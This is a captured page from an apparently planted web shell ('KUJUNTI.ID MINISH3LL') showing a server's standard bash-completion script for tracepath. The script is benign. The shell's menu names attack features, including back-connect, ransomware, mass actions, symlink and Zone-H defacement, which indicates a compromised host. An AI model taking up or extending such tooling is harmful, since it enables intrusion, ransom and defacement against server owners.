KUJUNTI.ID MINISH3LL
Path : /usr/share/bash-completion/completions/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : //usr/share/bash-completion/completions/tracepath6


# tracepath(8) completion                                  -*- shell-script -*-

_tracepath()
{
    local cur prev words cword
    _init_completion || return

    case $prev in
        -*[lmp])
            return
            ;;
    esac

    if [[ $cur == -* ]]; then
        local opts=$(_parse_help "$1")
        COMPREPLY=($(compgen -W '${opts:-$(_parse_usage "$1")}' -- "$cur"))
        return
    fi

    local ipvx
    [[ $1 == *6 ]] && ipvx=-6
    _known_hosts_real ${ipvx-} -- "$cur"
} &&
    complete -F _tracepath tracepath tracepath6

# ex: filetype=sh

© KUJUNTI.ID